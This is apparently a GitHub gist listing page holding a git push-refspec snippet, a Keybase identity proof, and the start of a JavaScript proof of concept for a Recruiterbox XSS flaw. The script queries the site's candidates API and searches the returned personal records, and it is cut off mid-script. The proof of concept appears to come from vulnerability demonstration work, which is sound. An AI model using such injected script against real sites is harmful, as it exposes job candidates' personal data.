Skip to content

Instantly share code, notes, and snippets.

@djadmin
djadmin / config
Created Jan 16, 2016
Sync master with gh-pages branch
View config
$ vim .git/config
push = +refs/heads/master:refs/heads/gh-pages
push = +refs/heads/master:refs/heads/master
View keybase.md

Keybase proof

I hereby claim:

  • I am djadmin on github.
  • I am djadmin (https://keybase.io/djadmin) on keybase.
  • I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo

To claim this, I am signing this object:

@djadmin
djadmin / recruiterbox_exploit.js
Last active Aug 10, 2016
Recruiterbox.com HTML Injection Exploit
View recruiterbox_exploit.js
// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
var candidates = [];
var request = new XMLHttpRequest();
request.open('GET', '/api/v1/candidates/', true);
request.onload = function() {
var data = JSON.parse(request.responseText);
console.log(data);
candidates = data && data.objects;
var profile = candidates.find(function (cand) {
return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';